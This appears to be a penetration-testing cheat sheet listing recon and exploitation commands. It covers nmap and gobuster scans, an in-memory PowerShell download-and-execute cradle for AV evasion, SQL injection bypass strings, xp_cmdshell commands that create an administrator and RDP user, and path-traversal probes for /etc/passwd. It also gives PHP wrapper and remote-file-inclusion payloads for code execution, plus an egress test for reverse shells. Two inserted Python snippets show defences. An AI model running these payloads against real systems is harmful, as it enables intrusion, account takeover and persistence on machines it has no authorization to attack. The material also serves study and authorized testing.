Reconnaissance & enumeration

Enum, enum, enom, enomm, nom nomm!

Bash log

Log all commands and their output:

script target.log

Port scanning

Nmap

nmap -A -sS -Pn -n x.x.x.x

Scan all UDP ports without retries:

nmap -sU -p- --max-retries 0 --min-rate 500 x.x.x.x

Nc

nc -nvv -w 1 -z x.x.x.x 1-100

This nc command can be very useful to check egress filtering -> see below

PowerShell (in memory -> AV evasion)

powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/Invoke-Portscan.ps1');Invoke-Portscan -Hosts x.x.x.x"

Host enum

nikto -h x.x.x.x
enum4linux x.x.x.x

Is the target 32 or 64 bit? https://github.com/SecureAuthCorp/impacket/blob/master/examples/getArch.py

python getArch.py -target x.x.x.x

DNS zone transfer

dig axfr domain.com @nameserver

Web fuzzing

Gobuster

gobuster -u x.x.x.x -w /usr/share/seclists/Discovery/Web_Content/common.txt -t 20
gobuster -u x.x.x.x -w /usr/share/seclists/Discovery/Web_Content/quickhits.txt -t 20
gobuster -u x.x.x.x -w /usr/share/seclists/Discovery/Web_Content/common.txt -t 20 -x .txt,.php

Wfuzz

wfuzz -w /usr/share/seclists/Discovery/Web_Content/common.txt --hc 400,404,500 http://x.x.x.x/FUZZ
wfuzz -w /usr/share/seclists/Discovery/Web_Content/quickhits.txt --hc 400,404,500 http://x.x.x.x/FUZZ

Samba (SMB)

Do not underestimate this one ;)

smbclient -L x.x.x.x
nmap --script=smb-check-vulns.nse x.x.x.x
smbmount //x.x.x.x/share /mnt -o username=hodor,workgroup=hodor
mount -t cifs //x.x.x.x/share /mnt
mount -t cifs -o username=hodor,password=hodor //x.x.x.x/share /mnt
smbclient \\\\x.x.x.x\\share

Anonymous bind using rpcclient:

rpcclient -U "" x.x.x.x

SNMP

Scan using the default community string:

snmpwalk -c public -v1 x.x.x.x

Discover valid usernames by brute force querying possible usernames against a Kerberos service (source: https://nmap.org/nsedoc/scripts/krb5-enum-users.html)

nmap -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='domain.local',userdb=/usr/share/wordlists/SecLists/Usernames/top_shortlist.txt x.x.x.x

CMS

CMSmap

cmsmap.py https://x.x.x.x

WPscan

wpscan --url https://x.x.x.x

Bruteforce login:

wpscan --url http://x.x.x.x --wordlist /usr/share/wordlists/SecLists/Passwords/best1050.txt --username admin --threads 10

SQL injection

Test for authentication bypass

1' or '1'='1
1' or '1'='1'
1' or '1'='1'--
' or 1=1 --
a' or 1=1 --
" or 1=1 --
a" or 1=1 --
' or 1=1 #
" or 1=1 #
or 1=1 --
' or 'x'='x
" or "x"="x
') or ('x'='x
") or ("x"="x
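As an added illustration (not part of the original cheat sheet), the string-built query these payloads break, beside the parameterized form that defeats them; the users table and credentials are constructed here:

```python
import sqlite3

# Constructed sample table; the real application's schema is an assumption.
def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT, password TEXT)")
    con.execute("INSERT INTO users VALUES ('admin', 'S3cretPass')")
    return con

def login_vulnerable(con, username, password):
    # String concatenation: a quote in the input closes the literal and
    # the rest of the payload is parsed as SQL.
    sql = ("SELECT COUNT(*) FROM users WHERE username = '%s' "
           "AND password = '%s'" % (username, password))
    try:
        return con.execute(sql).fetchone()[0] > 0
    except sqlite3.Error:
        # A syntax error (e.g. a '#' comment, which SQLite lacks) is a
        # failed login, not a bypass.
        return False

def login_hardened(con, username, password):
    # Parameterized query: values are bound by the driver, so quotes and
    # comment sequences never reach the SQL parser as syntax.
    sql = "SELECT COUNT(*) FROM users WHERE username = ? AND password = ?"
    return con.execute(sql, (username, password)).fetchone()[0] > 0

# A few of the bypass strings listed above, used as both username and password.
PAYLOADS = ["1' or '1'='1", "' or 1=1 --", "' or 'x'='x"]

def bypass_results(login):
    """Map each payload to whether it logged in without valid credentials."""
    con = make_db()
    return {p: login(con, p, p) for p in PAYLOADS}

if __name__ == "__main__":
    print("vulnerable:", bypass_results(login_vulnerable))
    print("hardened:  ", bypass_results(login_hardened))
```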

Use time delays to find injectable parameter

';WAITFOR DELAY '0:0:5'--

SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/

+BENCHMARK(40000000,SHA1(1337))+
'%2Bbenchmark(3200,SHA1(1))%2B'

If the above works, try to enable xp_cmdshell (source: http://pentestmonkey.net/blog/resurecting-xp_cmdshell)

EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

xp_cmdshell - test ping

';exec master..xp_cmdshell 'ping -n 3 x.x.x.x'; --

xp_cmdshell - add admin user

';exec master..xp_cmdshell 'net user hodor Qwerty123! /ADD && net localgroup administrators hodor /ADD'; --

xp_cmdshell - add admin user and to RDP group

';exec master..xp_cmdshell 'net user hodor Qwerty123! /ADD && net localgroup administrators hodor /ADD && net localgroup "Remote Desktop Users" hodor /ADD'; --

Local File Inclusion (LFI)

Basic checks

Linux

../../../../../../../../../../etc/passwd
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
../../../../../../../../../../etc/passwd%00
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%2500

Windows

../../../../../../../../../../boot.ini
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini
../../../../../../../../../../boot.ini%00
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%2500

../../../../../../../../../../windows/system32/drivers/etc/hosts
../../../../../../../../../../windows/system32/drivers/etc/hosts%00
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/system32/drivers/etc/hosts
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/system32/drivers/etc/hosts%2500

Wordlists: https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/LFI
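Added example (not from the original page): a path-resolution check that rejects every Linux traversal probe listed above, including the null-byte and double-encoded variants, while still serving a normal request; WEBROOT is an assumed document root.

```python
import posixpath
from urllib.parse import unquote

WEBROOT = "/var/www/files"  # assumed document root, not from the page

def safe_resolve(user_path, root=WEBROOT):
    """Return the absolute path to serve, or None when the request is rejected."""
    # Decode exactly once: the %2500 variants above only work when a second
    # decode turns %25 into % and then %00 into a NUL byte.
    decoded = unquote(user_path)
    # A NUL byte never belongs in a file name (it is what truncates the path
    # in the %00 payloads), so reject it outright.
    if "\x00" in decoded:
        return None
    # Anchor under the root and collapse every ../ lexically, then confirm
    # the result is still inside the root.
    full = posixpath.normpath(posixpath.join(root, decoded.lstrip("/")))
    if posixpath.commonpath([root, full]) != root:
        return None
    # A real handler should also os.path.realpath() the result so a symlink
    # inside the root cannot point back out of it.
    return full

# Constructed probes: the Linux traversal strings from the list above.
TRAVERSAL_PROBES = [
    "../../../../../../../../../../etc/passwd",
    "..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd",
    "../../../../../../../../../../etc/passwd%00",
    "..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%2500",
]

def probe_results():
    """Map each probe to the path it would resolve to (None = rejected)."""
    return {p: safe_resolve(p) for p in TRAVERSAL_PROBES}

if __name__ == "__main__":
    for probe, result in probe_results().items():
        print(probe, "->", result)
    print("docs/readme.txt ->", safe_resolve("docs/readme.txt"))
```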

LFI Wrappers

expect://

http://x.x.x.x/blah?parameter=expect://whoami

data://

http://x.x.x.x/blah?parameter=data://text/plain;base64,PD8gcGhwaW5mbygpOyA/Pg==
# the base64 encoded payload is: <? phpinfo(); ?>

php://input

http://x.x.x.x/blah?parameter=php://input
# POST data (using Hackbar)
<? phpinfo(); ?>

LFI to RCE

Just check: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20inclusion#wrapper-data

Remote File Inclusion (RFI)

Example request (where "x.x.x.x" is your attacker's IP):

GET /supersecret/admin.php?path=http://x.x.x.x/phpinfo.php%00

Check for egress filtering

In other words: find an outgoing port for a reverse shell. First, start tcpdump on your own box:

tcpdump -i eth0

Run at target (where x.x.x.x is your attacking box)

nc -nvv -w 1 -z x.x.x.x 1-100

Files and file systems

Unmounted file systems

cat /etc/fstab

World writeable directories

find / \( -wholename '/home/homedir*' -prune \) -o \( -type d -perm -0002 \) -exec ls -ld '{}' ';' 2>/dev/null | grep -v root

World writeable files

find / \( -wholename '/home/homedir/*' -prune -o -wholename '/proc/*' -prune \) -o \( -type f -perm -0002 \) -exec ls -l '{}' ';' 2>/dev/null

Writeable config files

find /etc/ -writable -type f 2>/dev/null
